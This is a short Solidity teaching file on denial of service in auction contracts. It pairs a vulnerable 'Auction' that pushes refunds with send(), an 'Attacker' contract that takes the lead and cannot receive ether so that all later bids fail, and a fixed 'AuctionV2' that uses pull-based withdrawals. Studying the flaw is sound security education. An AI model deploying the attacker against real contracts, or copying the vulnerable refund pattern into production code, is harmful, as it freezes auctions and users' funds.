Perform DOS Attack. Auction is contract vunerable to DOS attack and AuctionV2 solves this by using pull over push pattern

DOSAttack.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Auction {
    address payable public currentLeader;
    uint public highestBid;

    function bid() public payable {
        require(msg.value > highestBid);

        bool success = currentLeader.send(highestBid);
        require(success);

        currentLeader = payable(msg.sender);
        highestBid = msg.value;
    }
}

contract Attacker {
    Auction public immutable externalContract;

    constructor(address externalContractAddress) {
        externalContract = Auction(externalContractAddress);
    }

    function attack() public payable {
        externalContract.bid { value: msg.value }();
    }
    // receive() external payable {}
}

contract AuctionV2 {
    address payable public currentLeader;
    uint public highestBid;
    mapping(address => uint) public balances;

    function bid() public payable {
        require(msg.value > highestBid);

        // Instead of sending ether to address (pushing) we do pulling
        balances[currentLeader] += highestBid;

        currentLeader = payable(msg.sender);
        highestBid = msg.value;
    }

    function withdraw() public {
        require(msg.sender != currentLeader, "Current king cannot withdraw");

        uint amount = balances[msg.sender];
        balances[msg.sender] = 0;

        (bool sent, ) = msg.sender.call{value: amount}("");
        require(sent, "Failed to send Ether");
    }
}